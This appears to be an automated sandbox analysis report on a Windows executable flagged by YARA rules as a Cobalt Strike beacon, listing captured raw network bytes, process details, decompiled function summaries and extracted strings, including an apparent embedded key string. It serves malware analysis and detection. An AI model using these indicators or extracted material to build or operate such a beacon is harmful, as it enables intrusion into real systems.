2024-12-05 04:29:59 UTC	4096	IN	Data Raw: 85 8a 03 d1 1f b3 fa 3f 67 ab dd 7a 63 cc f6 73 dc a0 17 26 94 db 62 d4 80 16 21 d7 96 f5 fe a4 2b 15 ad ed 73 fe b2 84 5d ce ec 7f a8 e8 5b 5d cc 71 55 f1 5d 41 1a 43 f0 8c 8a ad 5e 60 ad 2f d4 59 1e 11 e3 b4 4c 60 0d 19 69 5f 24 d4 87 b2 d9 e5 ea 71 5b 41 16 3f ce 86 e0 32 6d 25 2b 51 55 11 c1 e8 6c 7b 89 3d 15 c9 e8 5d 7c 19 28 ff 20 69 dd b2 0d 40 6f 1e 77 73 e1 3b fb 41 16 27 28 50 20 53 94 17 8f 89 c0 1b 09 35 d8 18 ee 7f 4d 6e f8 6e 0d d3 97 62 0f 3c e1 82 66 c8 27 cd 4d 46 4e 31 db f2 dd 50 ba 2d 76 55 99 87 45 33 5a 03 71 aa 55 bc cc f0 87 73 02 36 da 07 13 62 74 2d 4a fb 14 8d 97 48 7e 72 df 8f 61 4e 73 07 e0 6c f8 46 44 f6 aa ac 34 bb 02 85 38 3a 6c db 38 5e fe 16 97 5a ba 35 a7 3e 48 53 58 8c 81 b3 76 cb 6f 03 27 c7 41 e9 82 c3 9b 99 4a 55 da Data Ascii: ?gzcs&b!+s][]qU]AC^`/YL`i_$q[A?2m%+QUl{=]\|( i@ows;A'(P S5Mnnb<f'MFN1P-vUE3ZqUs6bt-JH~raNslFD48:l8^Z5>HSXvo'AJU
2024-12-05 04:29:59 UTC	4096	IN	Data Raw: 4a 10 62 54 8c db 2b d6 26 69 60 e4 34 4b bb 66 bd 22 e5 15 60 87 fb db 0a d6 5e 57 b7 ce a8 86 4f e0 20 65 e7 47 b3 82 57 4c db 6e 73 72 0f 0e 7b 5d a7 6e 07 19 36 17 1f 48 d6 80 d1 cb 29 52 26 08 ca 98 3c 8d 99 ef 1c 8e ae 71 78 1d 2e 49 18 ef df b7 a2 28 bb 03 d1 a9 95 69 ea 41 25 e0 28 1f 57 db f4 86 71 68 98 89 b2 23 a8 0a cd 1c d7 fb cf 13 d1 54 d5 1e 0e 07 5a 25 ef 30 93 cf e4 61 bc cc 50 ba c3 56 f6 a7 63 96 19 6c a1 76 42 f3 0d d2 25 da 09 b5 9f e2 d2 5b e5 9f 52 ba 05 4e fc 34 63 4e 74 61 a0 9a 3c ba 9e a5 d4 38 26 f8 56 97 16 e4 a9 84 05 e9 d6 15 9c 0b 23 6f 85 bd 8a 92 fd fc a1 61 01 2e e0 77 34 f5 9c 0c c3 46 e3 ab 3e 0a e2 a6 d7 3e 93 98 6b 6e a8 ca dd ce d5 a3 e1 45 e0 c7 d1 57 17 c3 9a c7 d2 ec 72 98 c6 ac 86 a9 9f ca 70 92 4a 9d ee 64 bc Data Ascii: JbT+&i`4Kf"`^WO eGWLnsr{]n6H)R&<qx.I(iA%(Wqh#TZ%0aPVclvB%[RN4cNta<8&V#oa.w4F>>knEWrpJd
2024-12-05 04:29:59 UTC	4096	IN	Data Raw: 97 c7 fc 6a 7b ee 62 f0 78 68 58 a4 d5 ee a2 88 cb 4f 7c c3 a2 12 3f b6 c3 79 17 13 c5 76 b5 a7 da a1 39 47 8a fa dc b9 75 69 f5 80 0a ab 5a 9c df e1 e4 f2 1d 50 30 ed 3f 5f 60 7c 93 00 4e 71 fe 6d f9 75 97 22 94 2d ac 85 11 e4 e6 cb c2 d3 66 8a b6 49 ad 53 1e 53 09 52 0c b3 5a 45 26 c5 07 e8 18 db 1c cf 7e 10 fe 0b 84 c6 2f eb d0 dd 95 12 a7 54 c1 31 72 63 db c1 6a a6 37 17 a0 d9 53 1f 65 1d bc 10 58 ae 7a f9 33 24 9c 12 e6 60 be 0e dc c4 f4 f9 4a e6 77 6e 92 4c 14 c4 cc c8 b4 55 f4 b2 e0 2d aa c9 6a c1 ec 51 09 b4 bf 43 b3 06 23 a3 8a a2 29 20 c6 57 05 c7 a9 10 42 fc 1c cc 67 9d 17 af 2a c7 dc 7e f6 aa ed 6c 94 3e 10 ee 61 31 2b 3a f7 c7 62 70 2f 9c 6e cc 49 ee 39 c3 75 43 a6 95 39 ce 36 ae 0a fc 24 f8 82 c1 26 7a c9 47 bb 8a b4 b2 a3 6c 8a ad 12 0a 47 Data Ascii: j{bxhXO\|?yv9GuiZP0?_`\|Nqmu"-fISSRZE&~/T1rcj7SeXz3$`JwnLU-jQC#) WBg*~l>a1+:bp/nI9uC96$&zGlG
2024-12-05 04:29:59 UTC	4096	IN	Data Raw: 18 5d bc 33 d4 2b 6d 49 ce d1 bc 5b 45 12 ef 99 82 9c f8 7a 0e ee 71 44 48 fb 5d 32 2a 00 3e b6 f4 16 3c a2 7a b1 43 60 e9 4c 80 8c f7 e5 d6 0e 0f 4a 4c 6c d1 57 d0 bc cb 87 a8 27 09 7e 3b ea 3e 4e 03 47 02 2e 81 f3 f4 76 56 47 a7 90 ba eb 37 4b c2 ec a0 81 d7 93 18 6e 4c e5 1b 11 08 17 03 f4 fa 4d 46 b0 4d 0d 0d 58 a1 3f 18 52 44 6a 0a b1 a1 84 c9 ae 2b 45 71 56 2a 49 71 2b 92 3d 40 56 af 05 a0 67 19 04 1b 76 b4 45 23 fd 54 69 f9 65 5a ca 0f a6 7b 8b f7 3b 3e d0 78 68 0e 2d c0 d7 69 ee 3b 24 b7 da 2a 57 a6 71 72 d5 04 73 ba c9 84 71 f7 f3 5e 00 bd e5 7b b6 85 7c 65 e1 df 67 76 50 eb 1d 1f 32 07 dc fa 4d 22 37 9b 70 3b 84 f7 b4 0a 28 72 5b 70 ce fa 88 07 51 5b 86 15 02 db 69 64 43 df 47 02 ee af bc 72 be b7 72 a9 cf 96 22 3c e0 f3 27 21 e9 59 6e 5b 2a 2d Data Ascii: ]3+mI[EzqDH]2><zC`LJLlW'~;>NG.vVG7KnLMFMX?RDj+EqVIq+=@VgvE#TieZ{;>xh-i;$Wqrsq^{\|egvP2M"7p;(r[pQ[idCGrr"<'!Yn[-

Target ID:	0
Start time:	23:29:55
Start date:	04/12/2024
Path:	C:\Users\user\Desktop\31#U544a.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\31#U544a.exe"
Imagebase:	0x7ff71a7a0000
File size:	604'672 bytes
MD5 hash:	7D6748D103F78D1A8DDAB5646C5CB1A3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2905522054.000001912B7A1000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.2905472003.000001912B770000.00000020.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1690951119.000001912B270000.00000010.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1690951119.000001912B270000.00000010.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1690951119.000001912B270000.00000010.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.1690951119.000001912B270000.00000010.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2905242341.000001912B670000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2905242341.000001912B670000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2905242341.000001912B670000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.2905242341.000001912B670000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	4.7%
Dynamic/Decrypted Code Coverage:	31.6%
Signature Coverage:	19.7%
Total number of Nodes:	699
Total number of Limit Nodes:	70

Executed Functions

Function 00007FF71A81173C Relevance: 135.1, APIs: 67, Strings: 9, Instructions: 2118COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A8117CF
memcpy.MSVCRT ref: 00007FF71A8117E8
memcpy.MSVCRT ref: 00007FF71A81190D
memcpy.MSVCRT ref: 00007FF71A81193A
memcpy.MSVCRT ref: 00007FF71A811952
memcpy.MSVCRT ref: 00007FF71A811991
memcpy.MSVCRT ref: 00007FF71A811BC5
memcpy.MSVCRT ref: 00007FF71A811C58
memcpy.MSVCRT ref: 00007FF71A811C92

Strings

uri host is valid header value, xrefs: 00007FF71A812EF8
httphttpswswssfile:///home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/url-2.5.0/src/parser.rs, xrefs: 00007FF71A812CEB
Flatten polled after completion/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/futures-util-0.3.30/src/future/future/flatten.rs, xrefs: 00007FF71A81413F
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF71A814207
Map must not be polled after it returned `Poll::Ready`, xrefs: 00007FF71A814127
internal error: entered unreachable codemid > len, xrefs: 00007FF71A81415F, 00007FF71A8141D9
size overflows MAX_SIZE, xrefs: 00007FF71A81422B
authority implies host, xrefs: 00007FF71A812B07
domain is valid Uri, xrefs: 00007FF71A8141C1

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID: Flatten polled after completion/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/futures-util-0.3.30/src/future/future/flatten.rs$Map must not be polled after it returned `Poll::Ready`$authority implies host$called `Result::unwrap()` on an `Err` value$domain is valid Uri$httphttpswswssfile:///home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/url-2.5.0/src/parser.rs$internal error: entered unreachable codemid > len$size overflows MAX_SIZE$uri host is valid header value
API String ID: 3510742995-1581683678
Opcode ID: f03ed357ce18c32f086c103f06d86097b394d98cdb5d9add489c4e85fabd8cca
Instruction ID: 2655203a48233ae4490df6ba44ef4046d946e32f034d6256ac61e80b5166a04b
Opcode Fuzzy Hash: f03ed357ce18c32f086c103f06d86097b394d98cdb5d9add489c4e85fabd8cca
Instruction Fuzzy Hash: EB339D62A08FD285FB61EB14E0447EAA764FB85798F844076DE8D03786EF3CE259C750

Function 00007FF71A7A3611 Relevance: 78.1, APIs: 32, Strings: 11, Instructions: 2845COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A7A4124
memcpy.MSVCRT ref: 00007FF71A7A4170
memcpy.MSVCRT ref: 00007FF71A7A43B3
memcpy.MSVCRT ref: 00007FF71A7A44F0
memcpy.MSVCRT ref: 00007FF71A7A458E
memcpy.MSVCRT ref: 00007FF71A7A4636
memcpy.MSVCRT ref: 00007FF71A7A4B7C
memcpy.MSVCRT ref: 00007FF71A7A4BBF

Part of subcall function 00007FF71A7A9540: memcpy.MSVCRT ref: 00007FF71A7A95A2

Strings

has_authority means set_username shouldn't fail, xrefs: 00007FF71A7A4326
tx only taken on error, xrefs: 00007FF71A7A6D38, 00007FF71A7A6D63
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF71A7A3F25, 00007FF71A7A578A, 00007FF71A7A65AD
*/*, xrefs: 00007FF71A7A36ED
base64 is always valid HeaderValue/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/reqwest-0.11.25/src/util.rs, xrefs: 00007FF71A7A4F65
:///home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/url-2.5.0/src/parser.rs, xrefs: 00007FF71A7A41B0
jT6cTLcUEB72GzKjkLp3d0RXNI6z5wwWh26ml9rrXe0=:W2QxQTByRbJ/reSL:\/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/aes-0.8.4/src/soft/fixslice64.rs, xrefs: 00007FF71A7A5663
has_authority means set_password shouldn't fail, xrefs: 00007FF71A7A4349
core thread panicked, xrefs: 00007FF71A7A506A
reqwest-internal-sync-runtime, xrefs: 00007FF71A7A38B4
size overflows MAX_SIZE, xrefs: 00007FF71A7A36B2

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID: */*$:///home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/url-2.5.0/src/parser.rs$base64 is always valid HeaderValue/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/reqwest-0.11.25/src/util.rs$called `Result::unwrap()` on an `Err` value$core thread panicked$has_authority means set_password shouldn't fail$has_authority means set_username shouldn't fail$jT6cTLcUEB72GzKjkLp3d0RXNI6z5wwWh26ml9rrXe0=:W2QxQTByRbJ/reSL:\/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/aes-0.8.4/src/soft/fixslice64.rs$reqwest-internal-sync-runtime$size overflows MAX_SIZE$tx only taken on error
API String ID: 3510742995-1693400321
Opcode ID: f237b5228748963b809a59ce3c68717bfe257837488a1891ab17c70db7d24fe5
Instruction ID: b64d15e7e5653de045892f610cabf4579ceac4e550524d400c6e19254c816b81
Opcode Fuzzy Hash: f237b5228748963b809a59ce3c68717bfe257837488a1891ab17c70db7d24fe5
Instruction Fuzzy Hash: E0638222A09FC191F721AF25E4413EAE360FB99B94F848272DA8D17756DF3CE259C710

Function 00007FF71A7F8A58 Relevance: 30.6, APIs: 15, Strings: 4, Instructions: 2062COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A7F8C07
memcpy.MSVCRT ref: 00007FF71A7F8C9B
memcpy.MSVCRT ref: 00007FF71A7F91F2
memset.MSVCRT ref: 00007FF71A7F92F5
memcpy.MSVCRT ref: 00007FF71A7F9A8B
memcpy.MSVCRT ref: 00007FF71A7FAFFB
memcpy.MSVCRT ref: 00007FF71A7FB018

Strings

keep-aliveHTTP/1.1 100 Continueinternal error: entered unreachable code: poll_read_body invalid state: , xrefs: 00007FF71A7F8CD0
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF71A7FB509, 00007FF71A7FB561, 00007FF71A7FB5A7, 00007FF71A7FB5E9
Map must not be polled after it returned `Poll::Ready`, xrefs: 00007FF71A7FB3FC
internal error: entered unreachable codemid > len, xrefs: 00007FF71A7FB4C0, 00007FF71A7FB4D8

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy$memset
String ID: Map must not be polled after it returned `Poll::Ready`$called `Result::unwrap()` on an `Err` value$internal error: entered unreachable codemid > len$keep-aliveHTTP/1.1 100 Continueinternal error: entered unreachable code: poll_read_body invalid state:
API String ID: 438689982-623776711
Opcode ID: 8fd7d093e15a1f6463ed582f2c8422aa5f76f96840f409de9d45fc99a931067a
Instruction ID: d2e7d6479f766573bbc3712f61ace104c7dd1ad37ee724008dbd1661e585ef85
Opcode Fuzzy Hash: 8fd7d093e15a1f6463ed582f2c8422aa5f76f96840f409de9d45fc99a931067a
Instruction Fuzzy Hash: 6D335E62A0CBC285E671AF14E0453EEE3A0FB98754F844162DACC53B5ADF3CD699CB10

Function 00007FF71A80C1DD Relevance: 29.9, APIs: 14, Strings: 5, Instructions: 1358COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A80C265
memcpy.MSVCRT ref: 00007FF71A80DA67
memcpy.MSVCRT ref: 00007FF71A80DACF
memcpy.MSVCRT ref: 00007FF71A80DB1D
memcpy.MSVCRT ref: 00007FF71A80DB3C
memcpy.MSVCRT ref: 00007FF71A80DB74
memcpy.MSVCRT ref: 00007FF71A80E475
memcpy.MSVCRT ref: 00007FF71A80E4A2
memcpy.MSVCRT ref: 00007FF71A80E563
memcpy.MSVCRT ref: 00007FF71A80E7A6
memcpy.MSVCRT ref: 00007FF71A80E8F3
memcpy.MSVCRT ref: 00007FF71A80EA8B

Strings

assertion failed: self.inner.semaphore.is_idle()/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/tokio-1.36.0/src/sync/mpsc/chan.rs, xrefs: 00007FF71A80DA3E, 00007FF71A80DA9E
httphttpswswssfile:///home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/url-2.5.0/src/parser.rs, xrefs: 00007FF71A80DC23
invalid maximum TLS version for backendvalid request parts, xrefs: 00007FF71A80CBE5
size overflows MAX_SIZE, xrefs: 00007FF71A80EB49
NO_PROXYno_proxy, xrefs: 00007FF71A80C351

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID: NO_PROXYno_proxy$assertion failed: self.inner.semaphore.is_idle()/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/tokio-1.36.0/src/sync/mpsc/chan.rs$httphttpswswssfile:///home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/url-2.5.0/src/parser.rs$invalid maximum TLS version for backendvalid request parts$size overflows MAX_SIZE
API String ID: 3510742995-1717467724
Opcode ID: 592d1e0028f5690b7abf567fcf70265c776644248edb0080bc933f1d978cd826
Instruction ID: d004bc87d1bb627ec90d0c53caaa6bb66675cea5bd5d044da35d73014a51ac02
Opcode Fuzzy Hash: 592d1e0028f5690b7abf567fcf70265c776644248edb0080bc933f1d978cd826
Instruction Fuzzy Hash: D8E27872A08FC181E762AB14E4443EEB7A4FB88794F844176DA8D17B99DF3CD299C710

Function 00007FF71A7F0C67 Relevance: 21.8, APIs: 7, Strings: 7, Instructions: 832
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 00007FF71A7F0E3B

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF71A7F76B3, 00007FF71A7F77C0
Map must not be polled after it returned `Poll::Ready`, xrefs: 00007FF71A7F75D4
ALPN upgraded to HTTP/2/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/hyper-0.14.28/src/client/client.rs, xrefs: 00007FF71A7F1A43
TryFlatten polled after completion/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/futures-util-0.3.30/src/future/try_future/try_flatten.rs, xrefs: 00007FF71A7F75FC
assertion failed: DEFAULT_MAX_FRAME_SIZE <= val && val <= MAX_MAX_FRAME_SIZE/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/h2-0.3.24/src/frame/settings.rs, xrefs: 00007FF71A7F7649
internal error: entered unreachable codemid > len, xrefs: 00007FF71A7F75AC, 00007FF71A7F75BC, 00007FF71A7F75EC
assertion failed: max <= std::u32::MAX as usize, xrefs: 00007FF71A7F7661

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID: ALPN upgraded to HTTP/2/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/hyper-0.14.28/src/client/client.rs$Map must not be polled after it returned `Poll::Ready`$TryFlatten polled after completion/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/futures-util-0.3.30/src/future/try_future/try_flatten.rs$assertion failed: DEFAULT_MAX_FRAME_SIZE <= val && val <= MAX_MAX_FRAME_SIZE/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/h2-0.3.24/src/frame/settings.rs$assertion failed: max <= std::u32::MAX as usize$called `Result::unwrap()` on an `Err` value$internal error: entered unreachable codemid > len
API String ID: 3510742995-2226513332
Opcode ID: 6faba8f46417a4395515b9ba51f3191f7d1e9a5c550a9044d37e57159c5e36a2
Instruction ID: 011c6c14fe26f0a37c21a310667ca60d36e5e069e53b50b5f871ac96aefc2edd
Opcode Fuzzy Hash: 6faba8f46417a4395515b9ba51f3191f7d1e9a5c550a9044d37e57159c5e36a2
Instruction Fuzzy Hash: CC927E62A08FC285EB719F14E4503EAA361FB897A4F844176DA9C43B99DF3CD259CB10

Function 00007FF71A820507 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 296
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASocketW.WS2_32 ref: 00007FF71A8207BF
WSAGetLastError.WS2_32 ref: 00007FF71A8207E4
WSASocketW.WS2_32 ref: 00007FF71A820818
SetHandleInformation.KERNEL32 ref: 00007FF71A820835
GetLastError.KERNEL32 ref: 00007FF71A82083E
bind.WS2_32 ref: 00007FF71A820896
WSAGetLastError.WS2_32 ref: 00007FF71A8208A4
closesocket.WS2_32 ref: 00007FF71A8208AF
WSAGetLastError.WS2_32 ref: 00007FF71A8208CC

Strings

127.0.0.1:34254/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\collections\btree\navigate.rs, xrefs: 00007FF71A820529

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: ErrorLast$Socket$HandleInformationbindclosesocket
String ID: 127.0.0.1:34254/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\collections\btree\navigate.rs
API String ID: 891237031-2351542260
Opcode ID: b24ef55e186e51373e15fac5668b013096d265170a54ff17c74f2cb343f6e08f
Instruction ID: d5a6d468142416f4a3abf885ca07d13313aec7129c4b0166ccafc5c48b9002b6
Opcode Fuzzy Hash: b24ef55e186e51373e15fac5668b013096d265170a54ff17c74f2cb343f6e08f
Instruction Fuzzy Hash: B5C1C922A1CB4241F752AB14E44137AE6A1EB817B4F805173EE9D47BD5DF3CD8AAC720

Function 00007FF71A7EA451 Relevance: 17.4, APIs: 5, Strings: 5, Instructions: 2365COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A7EC8CE

Part of subcall function 00007FF71A7AAA2C: memcpy.MSVCRT ref: 00007FF71A7AAA57

memcmp.MSVCRT ref: 00007FF71A7ECB02
memcpy.MSVCRT ref: 00007FF71A7ECB65
memcpy.MSVCRT ref: 00007FF71A7ECF76

Strings

PRI * HTTP/2.0SM, xrefs: 00007FF71A7ECAFB
HTTP/1., xrefs: 00007FF71A7EA879
just sent Ok, xrefs: 00007FF71A7ED14F
close, xrefs: 00007FF71A7EB187
size overflows MAX_SIZE, xrefs: 00007FF71A7ED198

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy$memcmp
String ID: HTTP/1.$PRI * HTTP/2.0SM$close$just sent Ok$size overflows MAX_SIZE
API String ID: 3384217055-2780495454
Opcode ID: 99ff54ec46451ba3aa82f48be39aa608694a3a40cf7f87c3aefafc58550e317a
Instruction ID: 253e8606bc645fd3c6435ac7d4a7cfa57f97f5a44b67d92a5cf88545c416461d
Opcode Fuzzy Hash: 99ff54ec46451ba3aa82f48be39aa608694a3a40cf7f87c3aefafc58550e317a
Instruction Fuzzy Hash: 40339262A0CAC281F671AF14E0403FEA7A1FB997A4F844172DA8D57699DF3CD64DC710

Function 00007FF71A80E2CE Relevance: 15.5, APIs: 9, Strings: 1, Instructions: 527
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 00007FF71A80DB1D
memcpy.MSVCRT ref: 00007FF71A80DB3C
memcpy.MSVCRT ref: 00007FF71A80DB74
memcpy.MSVCRT ref: 00007FF71A80E475
memcpy.MSVCRT ref: 00007FF71A80E4A2
memcpy.MSVCRT ref: 00007FF71A80E563
memcpy.MSVCRT ref: 00007FF71A80E7A6
memcpy.MSVCRT ref: 00007FF71A80E8F3
memcpy.MSVCRT ref: 00007FF71A80EA8B

Strings

httphttpswswssfile:///home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/url-2.5.0/src/parser.rs, xrefs: 00007FF71A80DC23

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID: httphttpswswssfile:///home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/url-2.5.0/src/parser.rs
API String ID: 3510742995-2841460514
Opcode ID: 9c5260df02497e11d052b730d8a91ad21b9df45a120170834e6cdb7285e18642
